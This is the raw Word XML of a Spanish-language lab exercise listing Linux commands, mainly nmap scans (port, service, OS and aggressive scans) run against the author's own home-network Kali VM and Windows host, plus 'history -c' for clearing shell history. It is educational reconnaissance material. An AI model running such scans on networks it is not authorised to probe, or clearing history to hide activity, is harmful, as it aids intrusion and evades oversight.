      <w:r w:rsidRPr="00206562">
        <w:t>lsof -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEEAB52" w14:textId="1A26C010" w:rsidR="00EF1651" w:rsidRDefault="00EF1651" w:rsidP="00206562">
      <w:r w:rsidRPr="00EF1651">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD85FC9" wp14:editId="79DF6FB8">
            <wp:extent cx="1971675" cy="857250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1700776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764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5E98">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F95E98">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BA2D4CB" wp14:editId="10CA4551">
            <wp:extent cx="2990850" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1150982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9823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78CC6" w14:textId="6EE61E46" w:rsidR="00F95E98" w:rsidRPr="00206562" w:rsidRDefault="00F95E98" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D246116" wp14:editId="47AD53FF">
            <wp:extent cx="5162550" cy="1647825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1857411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4113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63E2" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="475C8AE5">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E009038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18. Ver usuarios conectados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A99A40" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>who</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DC65BB" w14:textId="7B236809" w:rsidR="00EF1651" w:rsidRPr="00206562" w:rsidRDefault="00EF1651" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="185B0860" wp14:editId="775CFBF3">
            <wp:extent cx="3886200" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1813251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51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F3DEC" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4449405E">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39477B2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19. Historial de comandos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064D2B2B" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C9269" w14:textId="037003D4" w:rsidR="00EF1651" w:rsidRPr="00206562" w:rsidRDefault="00EF1651" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B4F8F0A" wp14:editId="362F6739">
            <wp:extent cx="3562350" cy="4248150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1523762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626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BE7A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4937336F">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48012E74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20. Limpiar historial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705FF3B3" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>history -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE77C9A" w14:textId="3F511D77" w:rsidR="00567500" w:rsidRPr="00206562" w:rsidRDefault="00567500" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25E438AC" wp14:editId="3F5EDB2D">
            <wp:extent cx="2628900" cy="1933575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="21218925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925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518E2" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="65BD08A2">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40685D82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t>🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 2: REDES Y ESCANEO (21–40)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED82209" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="20010A7E">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="449E9CF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21. Escaneo básico con Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C47D5E3" w14:textId="41F858E9" w:rsidR="00C02B33" w:rsidRPr="00206562" w:rsidRDefault="00C02B33" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
      <w:r w:rsidRPr="00C02B33">
        <w:t>192.168.0.108</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C02B33">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F77CD31" wp14:editId="6207B5E1">
            <wp:extent cx="5382376" cy="2934109"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="2131384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845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5948C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="62FC3CDE">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5310B20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22. Escaneo de puertos específicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428A70FD" w14:textId="40D9971A" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -p 22,80,443 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00B659DE">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C02B33">
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E97E7AB" w14:textId="72BCD78A" w:rsidR="00C02B33" w:rsidRDefault="00B659DE" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51A5CD3B" wp14:editId="1805BAF5">
            <wp:extent cx="5400040" cy="1189355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8209871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871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CCD2" w14:textId="5A291264" w:rsidR="00B659DE" w:rsidRPr="00B659DE" w:rsidRDefault="00B659DE" w:rsidP="00B659DE">
      <w:r w:rsidRPr="00B659DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali Linux (VM):</w:t>
      </w:r>
      <w:r w:rsidRPr="00B659DE">
        <w:t xml:space="preserve"> 192.168.0.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20914264" w14:textId="15F9EB59" w:rsidR="00B659DE" w:rsidRDefault="00B659DE" w:rsidP="00B659DE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FC67014" wp14:editId="228A7EE1">
            <wp:extent cx="5400040" cy="4836160"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="714015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0155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4A3D" w14:textId="53FC5D8B" w:rsidR="00B659DE" w:rsidRPr="00B659DE" w:rsidRDefault="00B659DE" w:rsidP="00B659DE">
      <w:r w:rsidRPr="00B659DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows (Host):</w:t>
      </w:r>
      <w:r w:rsidRPr="00B659DE">
        <w:t xml:space="preserve"> 192.168.0.115 (visto en el Adaptador de Ethernet 3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7482C9" w14:textId="6455F33C" w:rsidR="00B659DE" w:rsidRPr="00206562" w:rsidRDefault="00D97CF8" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5061442D" wp14:editId="3E814418">
            <wp:extent cx="5191125" cy="6877050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1084306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3064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6776" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="01B7FA3A">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0716F3A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23. Escaneo rápido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595D123B" w14:textId="645F9772" w:rsidR="00D97CF8" w:rsidRDefault="00206562" w:rsidP="00D97CF8">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -F 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00D97CF8">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00D97CF8">
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidR="00D97CF8">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D97CF8" w:rsidRPr="00206562">
        <w:t>nmap -F 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00D97CF8">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00D97CF8" w:rsidRPr="00206562">
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00D97CF8">
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D588F" w14:textId="62913D98" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562"/>
    <w:p w14:paraId="5890EDBA" w14:textId="0773768B" w:rsidR="00C02B33" w:rsidRPr="00206562" w:rsidRDefault="00D97CF8" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="739758B5" wp14:editId="10330A06">
            <wp:extent cx="5391150" cy="4676775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1173250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504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1D19" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="0A0733ED">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE815E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24. Escaneo de red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689E4119" w14:textId="75210CC3" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00830F46">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t>.0/2</w:t>
      </w:r>
      <w:r w:rsidR="00830F46">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375AD723" w14:textId="59A2BF57" w:rsidR="00C02B33" w:rsidRPr="00206562" w:rsidRDefault="00830F46" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53935162" wp14:editId="55A60234">
            <wp:extent cx="5381625" cy="3400425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1052604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048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3CAB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="515FCF0F">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="610824C4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25. Detección de servicios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10775955" w14:textId="2D344880" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -sV 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00364C15">
        <w:t>0.115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C523E9" w14:textId="546D1E41" w:rsidR="00364C15" w:rsidRPr="00206562" w:rsidRDefault="00364C15" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="792E84DE" wp14:editId="39D7F2DC">
            <wp:extent cx="5400040" cy="2664460"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="266196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9660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DB75" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6397599D">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB1FF9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26. Detección de SO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA6B611" w14:textId="2EF19858" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -O 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00364C15">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00364C15">
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ECDAC8" w14:textId="72321D15" w:rsidR="00364C15" w:rsidRPr="00206562" w:rsidRDefault="00364C15" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="079299A1" wp14:editId="7486DB94">
            <wp:extent cx="5400040" cy="2554605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1024140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401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39A31" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4055D186">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F38E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27. Escaneo agresivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A177798" w14:textId="5C97D7A2" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -A 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00364C15">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00364C15">
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00312A5B">
        <w:t xml:space="preserve"> (incluye -O, -sV, -sC, --traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC3F624" w14:textId="0152F58E" w:rsidR="00364C15" w:rsidRDefault="00364C15" w:rsidP="00206562">
      <w:r w:rsidRPr="00364C15">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66A2E8A7" wp14:editId="2F614E13">
            <wp:extent cx="5400040" cy="3240405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1128714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71479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AB028" w14:textId="77777777" w:rsidR="00312A5B" w:rsidRDefault="00312A5B" w:rsidP="00206562"/>
    <w:p w14:paraId="73A69163" w14:textId="7694B99B" w:rsidR="00312A5B" w:rsidRPr="00312A5B" w:rsidRDefault="00312A5B" w:rsidP="00312A5B">
      <w:r w:rsidRPr="00312A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Detección de Sistema Operativo (-O):</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:t xml:space="preserve"> Nmap intenta adivinar qué SO corre el objetivo analizando cómo responde la pila TCP/IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5824851D" w14:textId="06A981F1" w:rsidR="00312A5B" w:rsidRPr="00312A5B" w:rsidRDefault="00312A5B" w:rsidP="00312A5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Se observa que: </w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:t xml:space="preserve"> Nmap estima que es un </w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft Windows 10/11 o Server 2019</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:t xml:space="preserve"> con un 92% de precisión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C139702" w14:textId="3CCE98A5" w:rsidR="00312A5B" w:rsidRPr="00312A5B" w:rsidRDefault="00312A5B" w:rsidP="00312A5B">
      <w:r w:rsidRPr="00312A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Detección de Versión de Servicios (-sV):</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:t xml:space="preserve"> No solo te dice qué puertos están abiertos, sino qué software específico y qué versión se está ejecutando en ellos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6694E9A9" w14:textId="51631E97" w:rsidR="00312A5B" w:rsidRPr="00312A5B" w:rsidRDefault="00312A5B" w:rsidP="00312A5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Observamos</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:t xml:space="preserve"> En el puerto 135/tcp, identifica específicamente </w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:t xml:space="preserve">. En el puerto 7070, detecta un certificado SSL de </w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AnyDesk Client</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D4F299" w14:textId="353C29EB" w:rsidR="00312A5B" w:rsidRPr="00312A5B" w:rsidRDefault="00312A5B" w:rsidP="00312A5B">
      <w:r w:rsidRPr="00312A5B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Escaneo con Scripts de Nmap (-sC o --script default):</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:t xml:space="preserve"> Ejecuta una serie de scripts automáticos (NSE - Nmap Scripting Engine) para encontrar vulnerabilidades comunes o información extra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796BE199" w14:textId="752E2760" w:rsidR="00312A5B" w:rsidRPr="00312A5B" w:rsidRDefault="00312A5B" w:rsidP="00312A5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00312A5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">En </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>la</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> imagen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> observamos que</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:t xml:space="preserve"> Se activó un script de SSL que extrajo las fechas de validez y el nombre común del certificado (AnyDesk Client).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABA9AE6" w14:textId="520623FE" w:rsidR="00312A5B" w:rsidRPr="00312A5B" w:rsidRDefault="00312A5B" w:rsidP="00312A5B">
      <w:r w:rsidRPr="00312A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traceroute (--traceroute):</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:t xml:space="preserve"> Muestra la ruta que siguen los paquetes hasta llegar al destino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D54E2F" w14:textId="75FCDE50" w:rsidR="00312A5B" w:rsidRPr="00312A5B" w:rsidRDefault="00312A5B" w:rsidP="00312A5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Observamos</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:t xml:space="preserve"> Al final aparece la sección TRACEROUTE, indicando que el objetivo está a </w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1 salto</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:t xml:space="preserve"> de distancia (está</w:t>
      </w:r>
      <w:r>
        <w:t>mos</w:t>
      </w:r>
      <w:r w:rsidRPr="00312A5B">
        <w:t xml:space="preserve"> en la misma red local).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F65654" w14:textId="77777777" w:rsidR="00364C15" w:rsidRPr="00206562" w:rsidRDefault="00364C15" w:rsidP="00206562"/>
    <w:p w14:paraId="5153F575" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3753D454">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC7148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28. Guardar resultados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B92A097" w14:textId="56376AC4" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -oN resultado.txt 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00364C15">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00364C15">
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00C4469D">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00C4469D" w:rsidRPr="00C4469D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-oN</w:t>
      </w:r>
      <w:r w:rsidR="00C4469D" w:rsidRPr="00C4469D">
        <w:t>: Indica "Output Normal" (salida normal)</w:t>
      </w:r>
      <w:r w:rsidR="00C4469D">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C4469D" w:rsidRPr="00C4469D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528D9998" w14:textId="70B8E232" w:rsidR="000B0C18" w:rsidRDefault="000B0C18" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FCA9631" wp14:editId="2C0A56EA">
            <wp:extent cx="5400040" cy="2643505"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="359146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461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EAFD" w14:textId="77777777" w:rsidR="00364C15" w:rsidRDefault="00364C15" w:rsidP="00206562"/>
    <w:p w14:paraId="09660E8F" w14:textId="2C17A88B" w:rsidR="00364C15" w:rsidRPr="00206562" w:rsidRDefault="00C4469D" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>cat resultado.txt (Visualizamos Fichero)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A659EB5" wp14:editId="6BEE6930">
            <wp:extent cx="5400040" cy="1553210"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="449592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9286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774A1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="26055B68">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB23208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29. Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E364C2C" w14:textId="47DDADFB" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ping google.com</w:t>
      </w:r>
      <w:r w:rsidR="00C4469D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C4469D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C4469D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5265E790" wp14:editId="698C1622">
            <wp:extent cx="5400040" cy="2794000"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="138961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610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589F">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF589F">
        <w:br/>
